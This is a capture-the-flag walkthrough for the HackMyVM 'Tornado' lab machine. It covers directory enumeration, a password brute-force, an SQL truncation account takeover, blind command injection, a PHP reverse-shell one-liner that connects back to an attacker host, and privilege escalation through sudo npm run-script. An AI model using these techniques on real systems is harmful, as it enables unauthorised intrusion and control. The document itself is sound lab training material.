Now as always let’s start with a nmap scan.
Enumeration
# Nmap 7.91 scan initiated Wed Dec 30 10:01:46 2020 as: nmap -sC -sV -p22,80 -oN nmap IP
Nmap scan report for tornado (IP)
Host is up (0.00064s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0f:57:0d:60:31:4a:fd:2b:db:3e:9e:2f:63:2e:35:df (RSA)
| 256 00:9a:c8:d3:ba:1b:47:b2:48:a8:88:24:9f:fe:33:cc (ECDSA)
|_ 256 6d:af:db:21:25:ee:b0:a6:7d:05:f3:06:f0:65:ff:dc (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:45:15:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 30 10:01:53 2020 -- 1 IP address (1 host up) scanned in 7.62 seconds
Once we visit the website we see the apache2 default page so let’s fire up gobuster and enumerating the port 80.
gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt
/index.html (Status: 200)
/manual (Status: 301)
/javascript (Status: 301)
/bluesky (Status: 301)
/server-status (Status: 403)
We have a /bluesky directory and nothing special there.. uuhm. Let's enumerate this one.
gobuster dir -q -u http://$ip/bluesky -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt
/index.html (Status: 200)
/contact.php (Status: 302)
/about.php (Status: 302)
/login.php (Status: 200)
/signup.php (Status: 200)
/css (Status: 301)
/imgs (Status: 301)
/js (Status: 301)
/logout.php (Status: 302)
/dashboard.php (Status: 302)
/port.php (Status: 302)
We can see a login page.
Let's have a look at the source code
<input type="text" name="uname" placeholder="email" maxlength="13"><br><br>
<input type="password" name="upass" placeholder="password"><br><br>
<input type="submit" value="Login" name="btn" class="button"><br>
We can see that the maximum character length is 13.
There was another signup.php page. Have a look at it and sign up.
In the dashboard we can navigate between home, about and portfolio. Only the contact page cannot be viewed - the comment feature has been turned off because of security purpose. In the source code of "Portfolio", we find a hint.
mmh… interesting! Let's check it out
Tried LFI vulnerability to access the imp.txt file but got nothing, then I remembered there is a way we can create alias in apache config file and also in linux cd ~user means home directory of user, so I though to give a try for ~tornado and then I found the imp.txt
imp.txt
ceo@tornado
cto@tornado
manager@tornado
hr@tornado
lfi@tornado
admin@tornado
jacob@tornado
it@tornado
sales@tornado
We find several emails and I enumerate them all with rockyou dict.
The only password I found was admin@tornado:hello
But that turned out to be a rabbit hole… we do not find anything new after we are logged in.
Do you remember the maximum character length of 13?
This brings me to the SQL Truncation Attack
The SQL Truncation vulnerability is a very interesting flaw in the database. The successful exploitation of this issue leads to user account compromise, as it means an attacker can access any users account with his own password. Sounds interesting!
<input type="text" name="uname" placeholder="email" maxlength="13">
Change the maxlength 13 to 15
<input type="text" name="uname" placeholder="email" maxlength="15">
Let's not waste time and register with jacob@tornado email but with one space and one character.
So we registered jacob from this form and then logged in into the application. "Welcome User jacob@tornado" successfully logged in.
We find a comment field on the contact page that was not available before.
Here's the tricky part, because if you run id command in contact page, it will not show you any output. Using sleep 30 command it was confirmed that this is RCE vulnerability.
use php reverse shell and start a Netcat listener.
php -r '$sock=fsockopen("Ip",Port);exec("/bin/sh -i <&3 >&3 2>&3");'
www-data@tornado:/var/www/html/bluesky$ whoami && id
whoami && id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@tornado:/var/www/html/bluesky$
sudo -l
(catchme) NOPASSWD: /usr/bin/npm
npm is a package manager for the JavaScript programming language.
First i created an index.js file
cd /tmp
mkdir shell
echo 'module.exports = install could be dangerous' > index.js
cp index.js shell
Now we need a package.json file and chmod to make it executable.
{
"name": "shell",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"shell": "/bin/bash"
},
"author": "",
"license": "ISC"
}
Finally, execute the script - command:
sudo -u catchme npm run-script shell
I enumerated a lot but i really didn’t find something exploitable.
In the home directory of catchme, you will find a python script called enc.py
It's Caesar keyed and similar to rot13.
Find the encrypted string inside and either rewrite the code, or go to this website (http://rumkin.com/tools/cipher/caesar-keyed.php) and enter each letter individually.
Example: a, b, c, d, e…
Once you have done it correctly, you will find the root password :)
Tornado created by catch_me75 (thank you)
This machine can be found at HackMyVM
–> Check it out!